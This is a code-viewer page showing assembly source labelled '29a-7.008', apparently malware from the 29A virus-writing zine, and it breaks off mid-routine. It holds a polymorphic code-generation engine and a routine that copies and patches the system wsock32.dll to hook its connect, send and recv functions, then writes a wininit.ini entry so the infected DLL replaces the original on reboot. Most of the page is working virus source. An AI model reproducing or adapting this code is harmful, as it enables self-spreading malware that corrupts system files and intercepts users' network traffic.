📄 29a-7.008
字号:
bmovrr:
push eax
push dword 2
call rnd
cmp al,0
jne _bmovrr0
pop eax
jmp _movrr0
_bmovrr0:
pop eax
jmp _movrr1
freeReg:
mov byte [eax+registers],0
inc byte [freer]
ret
getFreeReg:
push dword 7
call rnd
cmp byte [eax+registers],0
jne getFreeReg
mov byte [eax+registers],1
dec byte [freer]
ret
cmovri:
push eax
push edx
push dword 3
call rnd
cmp al,0
jne _cmovri0
pop edx
pop eax
jmp bmovri
_cmovri0:
cmp al,1
jne _cmovri1
pop edx
pop eax
cmp byte [freer],0
je bmovri
push eax
push edx
call getFreeReg
pop edx
push eax
push edx
call cmovri
pop edx
pop eax
mov dl,al
call freeReg
pop eax
xchg al,ah
mov al,dl
jmp cmovrr
_cmovri1:
push dword -1
call rnd
or eax,eax
jz _cmovri1
test eax,17
jz _cmovri1c
push eax
_cmovri1b:
push dword -1
call rnd
or eax,eax
jz _cmovri1b
rol eax,16
pop edx
adc eax,edx
_cmovri1c:
pop edx
add edx,eax
pop ecx
push eax
push ecx
mov eax,ecx
call cmovri
pop eax
pop edx
jmp near baddsub
bmovri:
push eax
push edx
push dword 3
call rnd
cmp al,0
jne _bmovri0
pop edx
pop eax
jmp _movri0
_bmovri0:
cmp al,1
jne _bmovri1
pop edx
pop eax
jmp _movri1
_bmovri1:
pop edx
pop eax
jmp _movri2
_movrr0:
cmp ah,al
je __movrr00
shl ah,3
or ah,al
or ah,0c0h
mov al,8bh
stosw
__movrr00:
ret
_movrr1:
cmp ah,al
je __movrr10
call _pushr
xchg al,ah
call _popr
__movrr10:
ret
_movri0:
shl al,3
or al,5
mov ah,8dh
xchg al,ah
stosw
mov eax,edx
stosd
ret
_movri1:
add al,0b8h
stosb
mov eax,edx
stosd
ret
_movri2:
push eax
call _pushi
pop eax
call _popr
ret
_addri:
or al,al
jnz __addri0
mov al,05h
stosb
jmp __addri1
__addri0:
push eax
mov al,081h
stosb
pop eax
add al,0c0h
stosb
__addri1:
mov eax,edx
stosd
ret
_subri:
or al,al
jnz __subri0
mov al,2dh
stosb
jmp __subri1
__subri0:
push eax
mov al,081h
stosb
pop eax
add al,0e8h
stosb
__subri1:
mov eax,edx
stosd
ret
_pushr:
add al,050h
stosb
ret
_popr:
add al,058h
stosb
ret
_pushi:
mov al,068h
stosb
mov eax,edx
stosd
ret
baddsub:
push eax
push edx
push dword 2
call rnd
cmp al,0
jne _baddsub0
pop edx
pop eax
jmp _subri
_baddsub0:
pop edx
pop eax
not edx
inc edx
jmp _addri
_orrr:
mov cl,9
mul cl
add al,0c0h
mov ah,09h
xchg ah,al
stosw
ret
_addmri:
mov ah,1
test dh,0ffh
jz __addmri8
push eax
mov al,66h
stosb
pop eax
inc ah
__addmri8:
dec ah
cmp al,_EBP
jne __addmriNOEBP
mov al,45h
add ah,80h
xchg al,ah
stosw
mov al,00
stosb
jmp __addmri0
__addmriNOEBP:
add ah,80h
xchg al,ah
stosw
__addmri0:
test dh,0ffh
jz __addmri8b
mov ax,dx
stosw
ret
__addmri8b:
mov al,dl
stosb
ret
_submri:
mov ah,1
test dh,0ffh
jz __submri8
push eax
mov al,66h
stosb
pop eax
inc ah
__submri8:
dec ah
cmp al,_EBP
jne __submriNOEBP
mov al,6dh
add ah,80h
xchg al,ah
stosw
mov al,00
stosb
jmp __submri0
__submriNOEBP:
add ah,80h
add al,28h
xchg al,ah
stosw
__submri0:
test dh,0ffh
jz __submri8b
mov ax,dx
stosw
ret
__submri8b:
mov al,dl
stosb
ret
; - poly.inc EOF -
; - wsock.inc BOF -
[extern CreateFileA]
[extern CloseHandle]
[extern GetFileSize]
[extern CreateFileMappingA]
[extern MapViewOfFile]
[extern UnmapViewOfFile]
[extern GetSystemDirectoryA]
[extern GetWindowsDirectoryA]
[extern CopyFileA]
[extern lstrcat]
[extern DeleteFileA]
installMailHook:
push ebp
mov ebp,esp
sub esp,260
push ebp
sub ebp,260
not dword [fmaskall]
call scansubject
not dword [wsock32dll]
not dword [wsock32dll+4]
push dword 260
push ebp
call GetSystemDirectoryA
or eax,eax
jz unableToHookMail
push dword wsock32dll
push ebp
call lstrcat
mov esi,ebp
call infectws
mov al,byte [hkey]
or al,al
jz wininitStuff
unableToHookMail:
pop ebp
leave
ret
wininitStuff:
not dword [wininitstr]
not dword [wininitstr+4]
not dword [wininit]
push dword 128
push ebp
call GetSystemDirectoryA
or eax,eax
jz unableToHookMail
push dword 128
mov esi,ebp
add esi,128
mov [fHnd],esi
push esi
call GetSystemDirectoryA
or eax,eax
jz unableToHookMail
push dword wsock32dllp
push dword [fHnd]
call lstrcat
mov byte [wsock32dll+10],'_'
push dword wsock32dllp
push ebp
call lstrcat
push dword 1
push ebp
push dword [fHnd]
call CopyFileA
or eax,eax
jz near unableToAddWininit
push dword [fHnd]
mov esi,ebp
call infectws
pop dword [fHnd]
mov al,byte [hkey]
or al,al
jz near unableToAddWininitPanic
push dword 128
push dword [fHnd]
call GetWindowsDirectoryA
or eax,eax
jz near unableToAddWininit
push dword wininit
push dword [fHnd]
call lstrcat
push dword 0
push dword 80h
push dword 2h
push dword 0
push dword 0
push dword 40000000h
push dword [fHnd]
call CreateFileA
inc eax
jz near unableToAddWininit
dec eax
push eax
push dword 0
push dword localtime
push dword wininitstrLen
push dword wininitstr
push eax
call WriteFile
mov esi,ebp
xor ecx,ecx
strsizeLoop:
lodsb
inc ecx
or al,al
jnz strsizeLoop
dec ecx
mov byte [esi-2],'l'
pop eax
push ecx
push esi
push eax
push dword 0
push dword localtime
push ecx
push ebp
push eax
call WriteFile
mov eax,[esp]
mov byte [wininitstr],'='
push dword 0
push dword localtime
push dword 1
push dword wininitstr
push eax
call WriteFile
pop eax
pop esi
pop ecx
push eax
mov byte [esi-2],'_'
push dword 0
push dword localtime
push ecx
push ebp
push eax
call WriteFile
call CloseHandle
unableToAddWininit:
pop ebp
leave
ret
unableToAddWininitPanic:
push ebp
call DeleteFileA
jmp unableToAddWininit
infectws:
mov byte [hkey],0
push dword 0
push dword 80h
push dword 3
push dword 0
push dword 0
push dword (80000000h | 40000000h)
push esi
call CreateFileA
inc eax
jz near infwsError
dec eax
mov [fHnd],eax
push dword 0
push eax
call GetFileSize
inc eax
jz near infwsErrorClose
dec eax
mov [fileSize],eax
xor eax,eax
push eax
push eax
push eax
push dword 4
push eax
push dword [fHnd]
call CreateFileMappingA
or eax,eax
jz near infwsErrorClose
mov dword [fhmap],eax
xor eax,eax
push eax
push eax
push eax
push dword 6
push dword [fhmap]
call MapViewOfFile
or eax,eax
jz near infwsErrorCloseMap
mov [mapMem],eax
mov edi,eax
cmp word [edi],'MZ'
jne near infwsErrorCloseUnmap
add edi,[edi+3ch]
cmp word [edi],'PE'
jne near infwsErrorCloseUnmap
mov esi,edi
mov eax,18h
add ax,[edi+14h]
add edi,eax
mov cx,[esi+06h]
dec cx
mov eax,28h
mul cx
add edi,eax
mov ecx,[edi+14h]
add ecx,[edi+10h]
cmp ecx,[fileSize]
jne near infwsErrorCloseUnmap
mov ebx,[edi+0ch]
add ebx,[edi+10h]
mov eax,[esi+34h]
mov [_wsockhookbase],ebx
add [_wsockhookbase],eax
mov eax,~'conn'
not eax
call patchAPI
jc near infwsErrorCloseUnmap
add eax,[esi+34h]
mov [_connect],eax
add ebx,my_send-my_connect
mov eax,~'send'
not eax
call patchAPI
jc near infwsErrorCloseUnmap
add eax,[esi+34h]
mov [_send],eax
xor ebx,ebx
mov eax,~'recv'
not eax
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -